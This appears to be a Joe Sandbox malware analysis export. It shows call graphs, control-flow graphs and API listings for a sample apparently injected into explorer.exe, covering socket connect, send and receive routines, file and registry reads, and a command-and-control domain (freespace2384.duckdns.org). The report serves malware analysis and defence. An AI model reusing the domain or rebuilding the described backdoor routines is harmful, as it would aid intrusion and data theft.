CloseHandle 4192->4184 4193 2f78374 CloseHandle 4193->4184 4194->4184 4195->4183 4196 2f780c5 WSAEventSelect 4195->4196 4197 2f780e5 4196->4197 4198 2f7811a CloseHandle 4196->4198 4197->4198 4198->4183 4200 2f75514 WSAGetLastError WSACreateEvent 4199->4200 4201 2f7550d 4199->4201 4202 2f75537 WSAEventSelect 4200->4202 4203 2f7552d 4200->4203 4201->4184 4205 2f7555b 4202->4205 4250 2f75551 4202->4250 4204 2f75b0c shutdown closesocket 4203->4204 4204->4201 4207 2f7577e 4205->4207 4208 2f7556b 4205->4208 4206 2f75b01 CloseHandle 4206->4204 4211 2f757a5 inet_addr 4207->4211 4212 2f75795 4207->4212 4209 2f75577 4208->4209 4210 2f75584 inet_addr 4208->4210 4215 2f755d6 htons connect 4209->4215 4210->4215 4216 2f7559d gethostbyname 4210->4216 4213 2f75809 htons connect 4211->4213 4214 2f757c4 gethostbyname 4211->4214 4212->4213 4213->4206 4217 2f7585c WSAGetLastError 4213->4217 4214->4212 4214->4250 4218 2f7561a WSAGetLastError 4215->4218 4215->4250 4216->4209 4216->4250 4217->4206 4219 2f7586d WSAWaitForMultipleEvents 4217->4219 4220 2f7562b WSAWaitForMultipleEvents 4218->4220 4218->4250 4225 2f75900 WSACloseEvent closesocket 4219->4225 4228 2f758e9 4219->4228 4223 2f7568c WSACloseEvent closesocket 4220->4223 4224 2f756a9 4220->4224 4223->4201 4226 2f756b3 WSACloseEvent closesocket 4224->4226 4227 2f756d0 4224->4227 4225->4201 4226->4201 4229 2f756d7 WSAEnumNetworkEvents 4227->4229 4230 2f75755 4227->4230 4228->4225 4231 2f7591d 4228->4231 4232 2f756f0 closesocket WSACloseEvent 4229->4232 4233 2f7570d 4229->4233 4234 2f7575c closesocket WSACloseEvent 4230->4234 4230->4250 4231->4206 4235 2f7592b WSAEnumNetworkEvents 4231->4235 4232->4201 4236 2f75735 4233->4236 4237 2f75718 closesocket WSACloseEvent 4233->4237 4234->4201 4238 2f75947 WSACloseEvent closesocket 4235->4238 4239 2f75964 4235->4239 4236->4230 4242 2f75740 WSACloseEvent 4236->4242 4237->4201 4238->4201 4240 2f7596e WSACloseEvent closesocket 4239->4240 4241 2f7598b 4239->4241 4240->4201 4243 2f75997 4241->4243 4244 2f759b2 inet_addr 4241->4244 4242->4201 4245 2f759f7 4243->4245 4246 2f75a7a 4243->4246 4244->4243 4321 2f75b40 LocalAlloc 4245->4321 4246->4206 4335 2f75cd0 LocalAlloc 4246->4335 4250->4206 4251 2f75a60 CloseHandle 4251->4201 4253 2f75aef CloseHandle 4253->4201 4255 2f744b7 4254->4255 4256 2f7403a 4254->4256 4257 2f7452e 4255->4257 4258 2f744da setsockopt 4255->4258 4259 2f7427d WaitForSingleObject 4256->4259 4260 2f7409a 4256->4260 4310 2f7422d 4256->4310 4269 2f745ae setsockopt 4257->4269 4285 2f7462e 4257->4285 4261 2f74518 4258->4261 4258->4310 4263 2f742a5 4259->4263 4264 2f740e6 4260->4264 4265 2f740b2 CloseHandle 4260->4265 4368 2f58b50 4261->4368 4267 2f742ff 4263->4267 4268 2f742cb CloseHandle 4263->4268 4263->4310 4270 2f74132 CreateEventW 4264->4270 4271 2f740fe CloseHandle 4264->4271 4265->4264 4274 2f74317 CloseHandle 4267->4274 4275 2f7434b CreateEventW 4267->4275 4268->4267 4276 2f745ec 4269->4276 4269->4310 4272 2f74156 CreateThread 4270->4272 4270->4310 4271->4270 4278 2f74222 CloseHandle 4272->4278 4279 2f741ac ResumeThread 4272->4279 4273 2f74532 4401 2f596b0 4273->4401 4274->4275 4281 2f7436f CreateThread 4275->4281 4275->4310 4434 2f74d40 send 4276->4434 4278->4310 4283 2f74217 CloseHandle 4279->4283 4295 2f7420d 4279->4295 4286 2f743c5 ResumeThread 4281->4286 4287 2f7443b CloseHandle 4281->4287 4282 2f7460f closesocket 4282->4310 4283->4278 4291 2f746a7 4285->4291 4296 2f746db 4285->4296 4285->4310 4288 2f74430 CloseHandle 4286->4288 4286->4295 4287->4310 4288->4287 4289 2f7454c 4433 2f74d40 send 4289->4433 4290 2f74548 4290->4257 4435 2f74af0 4291->4435 4294 2f7456f closesocket 4294->4310 4295->4310 4297 2f748e1 WaitForSingleObject 4296->4297 4298 2f74770 4296->4298 4296->4310 4301 2f74900 4297->4301 4302 2f7490e 4297->4302 4299 2f747a1 4298->4299 4300 2f7477f CloseHandle 4298->4300 4305 2f747d2 CreateEventW 4299->4305 4306 2f747b0 CloseHandle 4299->4306 4300->4299 4301->4302 4307 2f74a7c 4301->4307 4303 2f7493f 4302->4303 4304 2f7491d CloseHandle 4302->4304 4308 2f74970 CreateEventW 4303->4308 4309 2f7494e CloseHandle 4303->4309 4304->4303 4305->4310 4315 2f747fc 4305->4315 4306->4305 4307->4310 4448 2f74d40 send 4307->4448 4308->4310 4311 2f7499a CreateThread 4308->4311 4309->4308 4310->4192 4310->4193 4313 2f749d5 ResumeThread 4311->4313 4314 2f74a3c CloseHandle 4311->4314 4313->4295 4317 2f74a2e CloseHandle 4313->4317 4314->4310 4318 2f74837 ResumeThread 4315->4318 4319 2f7489e CloseHandle 4315->4319 4316 2f74aaf closesocket 4316->4310 4317->4314 4318->4295 4320 2f74890 CloseHandle 4318->4320 4319->4310 4320->4319 4322 2f75bb7 htons 4321->4322 4323 2f75a58 4321->4323 4350 2f75fb0 WSACreateEvent 4322->4350 4323->4250 4323->4251 4326 2f75cb7 LocalFree 4326->4323 4328 2f75c25 4328->4326 4358 2f75e90 WSACreateEvent 4328->4358 4332 2f75c6a 4332->4326 4333 2f75c8c und_memcpy 4332->4333 4334 2f75ca8 LocalFree 4333->4334 4334->4323 4336 2f75d49 htons 4335->4336 4337 2f75ae7 4335->4337 4338 2f75d99 4336->4338 4337->4206 4337->4253 4339 2f75fb0 5 API calls 4338->4339 4340 2f75dba 4339->4340 4341 2f75e6d LocalFree 4340->4341 4366 2f74d40 send 4340->4366 4341->4337 4343 2f75ddd 4343->4341 4344 2f75e90 5 API calls 4343->4344 4345 2f75e00 4344->4345 4345->4341 4367 2f74d00 recv 4345->4367 4347 2f75e20 4347->4341 4348 2f75e42 und_memcpy 4347->4348 4349 2f75e5e LocalFree 4348->4349 4349->4337 4351 2f75fdf WSAEventSelect 4350->4351 4352 2f75c01 4350->4352 4353 2f760b4 WSACloseEvent 4351->4353 4354 2f75ffd WSAWaitForMultipleEvents WSACloseEvent 4351->4354 4352->4326 4357 2f74d40 send 4352->4357 4353->4352 4354->4352 4356 2f7606f 4354->4356 4356->4352 4356->4353 4357->4328 4359 2f75c4a 4358->4359 4360 2f75ebf WSAEventSelect 4358->4360 4359->4326 4365 2f74d00 recv 4359->4365 4361 2f75f94 WSACloseEvent 4360->4361 4362 2f75edd WSAWaitForMultipleEvents WSACloseEvent 4360->4362 4361->4359 4362->4359 4364 2f75f4f 4362->4364 4364->4359 4364->4361 4365->4332 4366->4343 4367->4347 4369 2f58b67 4368->4369 4370 2f58b6c 4369->4370 4449 2f62ab0 SHGetKnownFolderPath 4369->4449 4370->4257 4370->4273 4375 2f58bc6 LocalAlloc 4377 2f58be7 lstrcpyW StrStrIW CreateFileW 4375->4377 4378 2f59070 4375->4378 4376 2f590a1 LocalFree 4376->4370 4377->4378 4379 2f58c5a GetFileSize 4377->4379 4380 2f59083 LocalFree 4378->4380 4381 2f5908e 4378->4381 4383 2f58c76 LocalAlloc 4379->4383 4384 2f5905d 4379->4384 4380->4381 4381->4376 4382 2f59096 LocalFree 4381->4382 4382->4376 4383->4384 4385 2f58c98 ReadFile 4383->4385 4384->4378 4386 2f59065 CloseHandle 4384->4386 4387 2f59052 LocalFree 4385->4387 4388 2f58ccf CloseHandle 4385->4388 4386->4378 4387->4384 4389 2f58d36 4388->4389 4389->4387 4390 2f58de9 LocalAlloc 4389->4390 4395 2f58ffd 4389->4395 4391 2f58e10 LocalAlloc 4390->4391 4390->4395 4392 2f58e37 4391->4392 4393 2f58fef LocalFree 4391->4393 4394 2f58e51 lstrcpyW lstrcpyW lstrcpyW 4392->4394 4393->4395 4398 2f58efe 4394->4398 4395->4387 4396 2f5903c VirtualFree 4395->4396 4396->4387 4397 2f58fe1 LocalFree 4397->4393 4398->4397 4399 2f58f58 LocalFree LocalFree LocalFree LocalFree 4398->4399 4399->4370 4402 2f596c8 4401->4402 4403 2f596cd 4402->4403 4404 2f62ab0 5 API calls 4402->4404 4403->4289 4403->4290 4405 2f596e5 4404->4405 4405->4403 4406 2f57e40 71 API calls 4405->4406 4407 2f5971e 4406->4407 4408 2f59727 LocalAlloc 4407->4408 4409 2f59c36 LocalFree 4407->4409 4410 2f59c10 4408->4410 4411 2f59748 lstrcpyW StrStrIW 4408->4411 4409->4403 4412 2f59c23 4410->4412 4413 2f59c18 LocalFree 4410->4413 4414 2f79e0c 9 API calls 4411->4414 4412->4409 4415 2f59c2b LocalFree 4412->4415 4413->4412 4416 2f597a4 RegGetValueW 4414->4416 4415->4409 4417 2f59c05 LocalFree 4416->4417 4418 2f597f3 LocalAlloc 4416->4418 4417->4410 4418->4417 4419 2f5983d RegGetValueW 4418->4419 4420 2f59bf7 LocalFree 4419->4420 4421 2f59885 4419->4421 4420->4417 4421->4420 4422 2f59997 LocalAlloc 4421->4422 4427 2f59ba2 4421->4427 4423 2f599be LocalAlloc 4422->4423 4422->4427 4424 2f599e5 4423->4424 4425 2f59b94 LocalFree 4423->4425 4426 2f599ff lstrcpyW lstrcpyW lstrcpyW 4424->4426 4425->4427 4430 2f59ab2 4426->4430 4427->4420 4428 2f59be1 VirtualFree 4427->4428 4428->4420 4429 2f59b86 LocalFree 4429->4425 4430->4429 4431 2f59b08 LocalFree LocalFree LocalFree 4430->4431 4431->4403 4433->4294 4434->4282 4436 2f74b29 4435->4436 4437 2f74b34 WaitForSingleObject 4436->4437 4439 2f74c67 4436->4439 4438 2f74b5a 4437->4438 4438->4439 4440 2f74b8d CloseHandle 4438->4440 4441 2f74ba9 4438->4441 4439->4295 4440->4441 4442 2f74bb5 CloseHandle 4441->4442 4443 2f74bd1 CreateEventW 4441->4443 4442->4443 4443->4439 4444 2f74bf5 4443->4444 4445 2f74c2a ResumeThread 4444->4445 4446 2f74c79 CloseHandle 4444->4446 4445->4439 4447 2f74c6e CloseHandle 4445->4447 4446->4439 4447->4446 4448->4316 4450 2f58b84 4449->4450 4451 2f62ad9 LocalAlloc 4449->4451 4450->4370 4456 2f57e40 4450->4456 4452 2f62af6 wnsprintfW 4451->4452 4453 2f62b4a CoTaskMemFree 4451->4453 4452->4453 4454 2f62b26 4452->4454 4453->4450 4455 2f62b30 CoTaskMemFree 4454->4455 4455->4450 4457 2f62ab0 5 API calls 4456->4457 4458 2f57e63 4457->4458 4459 2f57e74 LocalAlloc 4458->4459 4462 2f58861 4458->4462 4460 2f57e95 LocalAlloc 4459->4460 4461 2f58856 LocalFree 4459->4461 4463 2f57eb6 4460->4463 4464 2f5884b LocalFree 4460->4464 4461->4462 4462->4375 4462->4376 4465 2f57ebd wnsprintfW wnsprintfW 4463->4465 4466 2f57f08 4463->4466 4464->4461 4467 2f5881f LocalFree 4465->4467 4468 2f57f0f wnsprintfW wnsprintfW 4466->4468 4469 2f57f5a 4466->4469 4467->4462 4468->4467 4470 2f57f61 wnsprintfW wnsprintfW 4469->4470 4471 2f57fac 4469->4471 4470->4467 4472 2f57fb3 wnsprintfW wnsprintfW 4471->4472 4473 2f57ffe 4471->4473 4472->4467 4474 2f58005 wnsprintfW wnsprintfW 4473->4474 4475 2f58050 4473->4475 4474->4467 4476 2f58057 wnsprintfW wnsprintfW 4475->4476 4477 2f580a2 4475->4477 4476->4467 4478 2f580f4 4477->4478 4479 2f580a9 wnsprintfW wnsprintfW 4477->4479 4480 2f58146 4478->4480 4481 2f580fb wnsprintfW wnsprintfW 4478->4481 4479->4467 4482 2f5814d wnsprintfW wnsprintfW 4480->4482 4483 2f58198 4480->4483 4481->4467 4482->4467 4484 2f5819f wnsprintfW wnsprintfW 4483->4484 4485 2f581ea 4483->4485 4484->4467 4486 2f581f1 wnsprintfW wnsprintfW 4485->4486 4487 2f5823c 4485->4487 4486->4467 4488 2f58243 wnsprintfW wnsprintfW 4487->4488 4489 2f5828e 4487->4489 4488->4467 4490 2f58295 wnsprintfW wnsprintfW 4489->4490 4491 2f582e0 4489->4491 4490->4467 4492 2f582e7 wnsprintfW wnsprintfW 4491->4492 4493 2f58332 4491->4493 4492->4467 4494 2f58384 4493->4494 4495 2f58339 wnsprintfW wnsprintfW 4493->4495 4496 2f583d6 4494->4496 4497 2f5838b wnsprintfW wnsprintfW 4494->4497 4495->4467 4498 2f583dd wnsprintfW wnsprintfW 4496->4498 4499 2f58428 4496->4499 4497->4467 4498->4467 4500 2f5842f wnsprintfW wnsprintfW 4499->4500 4501 2f5847a 4499->4501 4500->4467 4502 2f58481 wnsprintfW wnsprintfW 4501->4502 4503 2f584cc 4501->4503 4502->4467 4504 2f584d3 wnsprintfW wnsprintfW 4503->4504 4505 2f5851e 4503->4505 4504->4467 4506 2f58525 wnsprintfW wnsprintfW 4505->4506 4507 2f58570 4505->4507 4506->4467 4508 2f58577 wnsprintfW wnsprintfW 4507->4508 4509 2f585c2 4507->4509 4508->4467 4510 2f58614 4509->4510 4511 2f585c9 wnsprintfW wnsprintfW 4509->4511 4512 2f58666 4510->4512 4513 2f5861b wnsprintfW wnsprintfW 4510->4513 4511->4467 4514 2f5866d wnsprintfW wnsprintfW 4512->4514 4515 2f586b8 4512->4515 4513->4467 4514->4467 4516 2f586bf wnsprintfW wnsprintfW 4515->4516 4517 2f5870a 4515->4517 4516->4467 4518 2f58711 wnsprintfW wnsprintfW 4517->4518 4519 2f5875c 4517->4519 4518->4467 4520 2f58763 wnsprintfW wnsprintfW 4519->4520 4521 2f587ab 4519->4521 4520->4467 4522 2f587b2 wnsprintfW wnsprintfW 4521->4522 4523 2f587fa LocalFree LocalFree LocalFree 4521->4523 4522->4467 4523->4462 4524 329dbb1 timeGetTime 4525 329dbd5 SleepEx 4524->4525 4527 329df67 4525->4527 4534 32ac715 4536 32ac71a 4534->4536 4541 32ac768 4536->4541 4538 32ac755 WaitForSingleObject 4540 32ac915 4538->4540 4542 32ac783 WaitForSingleObject 4541->4542 4544 32ac915 4542->4544 4544->4538

                                                          Executed Functions

                                                          Function 02F77D00 Relevance: 75.7, APIs: 40, Strings: 3, Instructions: 439synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 2f77d00-2f77d94 call 2f738f0 * 2 5 2f77d9f-2f77da6 0->5 6 2f7850f-2f78524 WaitForSingleObject 5->6 7 2f77dac-2f77dc1 WaitForSingleObject 5->7 9 2f78526-2f7852d 6->9 10 2f7852f 6->10 7->6 8 2f77dc7-2f77dec 7->8 14 2f78172-2f78199 WaitForMultipleObjects 8->14 15 2f77df2-2f77df9 8->15 9->10 12 2f78539-2f78544 9->12 13 2f7863b-2f78646 10->13 17 2f78556-2f7855e 12->17 16 2f78658-2f78660 13->16 22 2f781a5 14->22 23 2f7819b-2f781a3 14->23 18 2f77e12 15->18 19 2f77dfb-2f77e10 WaitForSingleObject 15->19 20 2f78666-2f78677 16->20 21 2f78700-2f78709 16->21 24 2f78564-2f78575 17->24 25 2f785fe-2f78607 17->25 18->13 19->18 28 2f77e1c-2f77e2d 19->28 29 2f786be-2f786cf 20->29 30 2f78679-2f786b2 shutdown closesocket 20->30 32 2f7870b-2f7872c shutdown closesocket 21->32 33 2f78738-2f7874f LocalFree 21->33 22->13 23->22 31 2f781af-2f781b7 23->31 34 2f78577-2f785b0 shutdown closesocket 24->34 35 2f785bc-2f785cd 24->35 26 2f78636 25->26 27 2f78609-2f7862a shutdown closesocket 25->27 26->5 27->26 36 2f77e33-2f77e3a 28->36 37 2f7816d 28->37 38 2f786d1-2f786f2 CloseHandle 29->38 39 2f786fb 29->39 30->29 40 2f781c3-2f781ca 31->40 41 2f781b9 31->41 32->33 34->35 42 2f785cf-2f785f0 CloseHandle 35->42 43 2f785f9 35->43 45 2f77e53 36->45 46 2f77e3c-2f77e51 WaitForSingleObject 36->46 37->14 38->39 39->16 48 2f781d6-2f781fb 40->48 49 2f781cc 40->49 41->12 42->43 43->17 45->14 46->45 50 2f77e58-2f77ec1 call 2f754d0 46->50 52 2f78201-2f78208 48->52 53 2f7850a 48->53 49->12 59 2f77ec7-2f77f0c setsockopt 50->59 60 2f7815d-2f78166 50->60 55 2f7821e 52->55 56 2f7820a-2f7821c WaitForSingleObject 52->56 53->5 55->13 56->55 58 2f78228-2f78245 WaitForSingleObject 56->58 61 2f78505 58->61 62 2f7824b-2f7827b WSAEnumNetworkEvents 58->62 63 2f77f12-2f77f48 setsockopt 59->63 64 2f7813c-2f78157 shutdown closesocket 59->64 60->37 61->53 66 2f78496-2f784fc shutdown closesocket CloseHandle 62->66 67 2f78281-2f7828d 62->67 63->64 65 2f77f4e-2f77f95 call 2f76620 63->65 64->60 65->64 74 2f77f9b-2f77fe3 call 2f760d0 65->74 66->61 69 2f78303-2f7830f 67->69 70 2f7828f-2f782fe shutdown closesocket CloseHandle 67->70 72 2f78494 69->72 73 2f78315-2f7834d recv 69->73 70->72 72->61 75 2f78425-2f7848b shutdown closesocket CloseHandle 73->75 76 2f78353-2f7836a call 2f73ff0 73->76 74->64 81 2f77fe9-2f77ff1 74->81 75->72 80 2f7836f-2f78372 76->80 82 2f783b4-2f7841a shutdown closesocket CloseHandle 80->82 83 2f78374-2f783b2 CloseHandle 80->83 81->64 84 2f77ff7-2f7804a call 2f76620 81->84 85 2f78423 82->85 83->85 84->64 88 2f78050-2f78098 call 2f760d0 84->88 85->72 88->64 91 2f7809e-2f780a6 88->91 91->64 92 2f780ac-2f780c3 WSACreateEvent 91->92 92->64 93 2f780c5-2f780e3 WSAEventSelect 92->93 94 2f780e5-2f78110 93->94 95 2f7811a-2f78133 CloseHandle 93->95 94->95 95->64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                          • String ID: 8$freespace2384.duckdns.org${284CAAEB-A60B-43DF-8753-01594F5F1089}
                                                          • API String ID: 3117981272-3822487198
                                                          • Opcode ID: 060e5cbb90cade43e79ae7c680d7ea8eae561d6ba71ce982744bc67b350b142a
                                                          • Instruction ID: e3d274bca42daf41b347b4510edb9e6dad27bad0c8fd768064e9eebc813a517e
                                                          • Opcode Fuzzy Hash: 060e5cbb90cade43e79ae7c680d7ea8eae561d6ba71ce982744bc67b350b142a
                                                          • Instruction Fuzzy Hash: 6432C732219A84C6E771DB15E8883EAB371F7C8799F604126DACA97B68CF7DC455CB00
                                                          Function 02F754D0 Relevance: 61.8, APIs: 41, Instructions: 306networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 96 2f754d0-2f7550b socket 97 2f75514-2f7552b WSAGetLastError WSACreateEvent 96->97 98 2f7550d-2f7550f 96->98 100 2f75537-2f7554f WSAEventSelect 97->100 101 2f7552d 97->101 99 2f75b29-2f75b30 98->99 103 2f75551 100->103 104 2f7555b-2f75565 100->104 102 2f75b0c-2f75b27 shutdown closesocket 101->102 102->99 105 2f75b01-2f75b06 CloseHandle 103->105 106 2f7577e-2f75793 104->106 107 2f7556b-2f75575 104->107 105->102 110 2f757a5-2f757c2 inet_addr 106->110 111 2f75795-2f757a3 106->111 108 2f75577-2f75582 107->108 109 2f75584-2f7559b inet_addr 107->109 114 2f755d6-2f75614 htons connect 108->114 109->114 115 2f7559d-2f755b6 gethostbyname 109->115 112 2f75809-2f75856 htons connect 110->112 113 2f757c4-2f757e3 gethostbyname 110->113 111->112 112->105 118 2f7585c-2f75867 WSAGetLastError 112->118 116 2f757e5-2f757fd 113->116 117 2f757ff 113->117 121 2f7561a-2f75625 WSAGetLastError 114->121 122 2f75779 114->122 119 2f755cc 115->119 120 2f755b8-2f755ca 115->120 116->112 117->105 118->105 123 2f7586d-2f7588e 118->123 119->105 120->114 121->122 124 2f7562b-2f75646 121->124 122->105 125 2f758b0-2f758e7 WSAWaitForMultipleEvents 123->125 126 2f75890-2f758a9 123->126 127 2f7565f-2f7568a WSAWaitForMultipleEvents 124->127 128 2f75648-2f7565b 124->128 131 2f75900-2f75918 WSACloseEvent closesocket 125->131 132 2f758e9-2f758f4 125->132 126->125 129 2f7568c-2f756a4 WSACloseEvent closesocket 127->129 130 2f756a9-2f756b1 127->130 128->127 129->99 133 2f756b3-2f756cb WSACloseEvent closesocket 130->133 134 2f756d0-2f756d5 130->134 131->99 132->131 135 2f758f6-2f758fe 132->135 133->99 136 2f756d7-2f756ee WSAEnumNetworkEvents 134->136 137 2f75755-2f7575a 134->137 135->131 138 2f7591d-2f75925 135->138 139 2f756f0-2f75708 closesocket WSACloseEvent 136->139 140 2f7570d-2f75716 136->140 137->122 141 2f7575c-2f75774 closesocket WSACloseEvent 137->141 138->105 142 2f7592b-2f75945 WSAEnumNetworkEvents 138->142 139->99 143 2f75735-2f7573e 140->143 144 2f75718-2f75730 closesocket WSACloseEvent 140->144 141->99 145 2f75947-2f7595f WSACloseEvent closesocket 142->145 146 2f75964-2f7596c 142->146 143->137 149 2f75740-2f75750 WSACloseEvent 143->149 144->99 145->99 147 2f7596e-2f75986 WSACloseEvent closesocket 146->147 148 2f7598b-2f75995 146->148 147->99 150 2f75997-2f759b0 148->150 151 2f759b2-2f759cf inet_addr 148->151 149->99 152 2f759e9-2f759f1 150->152 153 2f759d1-2f759dc 151->153 154 2f759de 151->154 155 2f759f7-2f75a5e call 2f75b40 152->155 156 2f75a7a-2f75a82 152->156 153->152 154->152 161 2f75a75 155->161 162 2f75a60-2f75a70 CloseHandle 155->162 156->105 158 2f75a84-2f75aed call 2f75cd0 156->158 158->105 164 2f75aef-2f75aff CloseHandle 158->164 161->105 162->99 164->99
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorEventLastclosesocketshutdownsocket
                                                          • String ID:
                                                          • API String ID: 1739004367-0
                                                          • Opcode ID: 748b36388d0e7929af8391b9f2131059fa9334e360e17a7592d3f9b96fd82472
                                                          • Instruction ID: 030bd15661a5e2198ca0791dbb6e63fe55b6fee89f4b7bffbc6a752547cd07f4
                                                          • Opcode Fuzzy Hash: 748b36388d0e7929af8391b9f2131059fa9334e360e17a7592d3f9b96fd82472
                                                          • Instruction Fuzzy Hash: F3F1DA76619AC5CAD7609F25F8547AAB7B0F788794F500126EFCA86B68DF38C484CF10
                                                          Function 02F58B50 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 240memoryfilestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 165 2f58b50-2f58b6a call 2f57d60 168 2f58b73-2f58b8f call 2f62ab0 165->168 169 2f58b6c-2f58b6e 165->169 173 2f58b95-2f58bc0 call 2f57e40 168->173 174 2f590ac 168->174 170 2f590ae-2f590b5 169->170 177 2f58bc6-2f58be1 LocalAlloc 173->177 178 2f590a1-2f590a6 LocalFree 173->178 174->170 179 2f58be7-2f58c54 lstrcpyW StrStrIW CreateFileW 177->179 180 2f5907b-2f59081 177->180 178->174 181 2f59070-2f5907a call 333011b 179->181 182 2f58c5a-2f58c70 GetFileSize 179->182 183 2f59083-2f59088 LocalFree 180->183 184 2f5908e-2f59094 180->184 181->180 186 2f58c76-2f58c92 LocalAlloc 182->186 187 2f5905d-2f59063 182->187 183->184 184->178 185 2f59096-2f5909b LocalFree 184->185 185->178 186->187 189 2f58c98-2f58cc9 ReadFile 186->189 187->181 190 2f59065-2f5906a CloseHandle 187->190 192 2f59052-2f59057 LocalFree 189->192 193 2f58ccf-2f58d34 CloseHandle 189->193 190->181 192->187 194 2f58d46-2f58d54 193->194 195 2f58d56-2f58d9e call 2f6e8a0 194->195 196 2f58da0-2f58dbb call 2f72660 194->196 195->194 196->192 202 2f58dc1-2f58de3 call 2f59140 196->202 205 2f58ffd-2f59006 202->205 206 2f58de9-2f58e0a LocalAlloc 202->206 205->192 208 2f59008-2f59026 call 2f590c0 205->208 206->205 207 2f58e10-2f58e31 LocalAlloc 206->207 209 2f58e37-2f58f01 call 2f7a620 lstrcpyW * 3 207->209 210 2f58fef-2f58ff7 LocalFree 207->210 208->192 215 2f59028-2f5904c VirtualFree 208->215 218 2f58f07-2f58f12 209->218 219 2f58fe1-2f58fe9 LocalFree 209->219 210->205 215->192 220 2f58f24-2f58f2c 218->220 219->210 220->219 221 2f58f32-2f58f52 220->221 222 2f58fdc 221->222 223 2f58f58-2f58f83 221->223 222->220 224 2f58f85-2f58f9b 223->224 225 2f58fa3-2f58fd7 LocalFree * 4 223->225 224->225 225->170
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                                                          • String ID: .DLL
                                                          • API String ID: 2968648924-899428287
